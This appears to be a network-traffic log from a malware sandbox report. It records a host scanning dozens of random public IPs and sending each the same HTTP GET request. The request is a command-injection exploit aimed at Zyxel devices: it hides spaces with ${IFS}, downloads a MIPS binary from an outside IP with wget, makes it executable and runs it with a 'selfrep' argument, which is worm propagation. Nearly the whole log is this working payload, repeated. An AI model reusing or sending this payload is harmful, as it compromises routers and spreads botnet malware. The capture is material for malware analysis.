                                                      Feb 2, 2024 06:35:12.177222967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      451192.168.2.143712271.229.252.80443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:13.181238890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      452192.168.2.144798288.46.76.129443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:13.181293964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      453192.168.2.144120649.93.70.0443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:13.181335926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      454192.168.2.1438138167.2.37.134443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:13.181413889 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      455192.168.2.1449290205.59.7.252443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:13.181457996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      456192.168.2.1433142202.182.14.169443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:13.181504011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      457192.168.2.1439030126.80.11.149443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:13.181596994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      458192.168.2.144941650.131.36.3443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:13.181654930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      459192.168.2.1441788151.180.34.41443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:14.185437918 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      460192.168.2.1454394210.220.102.163443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:14.185472012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      461192.168.2.14500342.47.39.137443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:14.185516119 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      462192.168.2.145394627.82.197.250443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:14.185545921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      463192.168.2.1439876210.213.226.29443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:14.185561895 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      464192.168.2.1454542164.195.47.246443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:14.185604095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      465192.168.2.1433432125.95.237.145443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:14.185637951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      466192.168.2.1447638104.161.29.136443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:14.185667038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      467192.168.2.1457656106.177.78.254443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:14.185718060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      468192.168.2.1460256209.166.52.79443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:14.185736895 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      469192.168.2.146099061.6.232.122443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:14.185758114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      470192.168.2.1450378167.148.46.157443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:14.186011076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      471192.168.2.1441098199.243.242.124443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:14.186031103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      472192.168.2.144976083.243.100.229443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:14.186031103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      473192.168.2.144384013.198.191.112443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:14.186073065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      474192.168.2.145776069.235.224.28443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:14.186153889 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      475192.168.2.145432447.99.126.240443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:14.186301947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      476192.168.2.1445268147.211.163.190443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:14.186628103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      477192.168.2.1433484113.86.130.97443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:14.186628103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      478192.168.2.1441666205.141.26.77443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:14.186753988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      479192.168.2.1452358156.27.58.10443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:15.191004038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      480192.168.2.1447138194.37.127.112443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:15.191036940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      481192.168.2.1434428197.114.173.112443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:15.191088915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      482192.168.2.1442410201.9.43.207443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:15.191123009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      483192.168.2.1439366210.29.192.40443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:15.191203117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      484192.168.2.145230250.189.203.241443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:15.191207886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      485192.168.2.14431969.118.20.72443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:15.191260099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      486192.168.2.1442986191.227.46.91443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:15.191276073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      487192.168.2.1439614167.56.102.228443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:15.191333055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      488192.168.2.1460590139.39.151.203443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:15.191339016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      489192.168.2.144652691.28.154.116443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:15.191375017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      490192.168.2.1436852212.133.7.197443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:15.191461086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      491192.168.2.1458866195.169.235.135443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:15.191462994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      492192.168.2.1451342153.68.252.73443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:15.191490889 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      493192.168.2.1438930182.230.3.32443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:15.191529036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      494192.168.2.1437798136.198.159.15443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:15.191581964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      495192.168.2.144164034.198.167.41443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:15.191597939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      496192.168.2.1435522178.149.98.141443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:15.191648960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      497192.168.2.1458534105.48.180.239443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:15.191694975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      498192.168.2.1437392160.226.21.190443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:15.191745996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      499192.168.2.143540292.239.200.247443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:15.192013979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      500192.168.2.144287897.45.84.108443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:15.192034960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      501192.168.2.144348248.243.79.161443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:16.195983887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      502192.168.2.143392835.21.37.182443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:16.195992947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      503192.168.2.144538848.43.225.189443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:16.196041107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      504192.168.2.1459872209.114.170.1443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:16.196074009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      505192.168.2.145550612.83.229.79443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:16.196134090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      506192.168.2.145720646.200.236.203443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:16.196162939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      507192.168.2.1444868125.29.111.79443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:16.196193933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      508192.168.2.145936077.249.121.151443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:16.196238041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      509192.168.2.143906077.228.179.173443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:16.196285963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      510192.168.2.1450488149.66.102.134443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:16.196321964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      511192.168.2.144874837.204.58.227443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:16.196340084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      512192.168.2.143599013.67.93.93443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:16.196376085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      513192.168.2.1442040117.32.201.126443
                                                      TimestampBytes transferredDirectionData
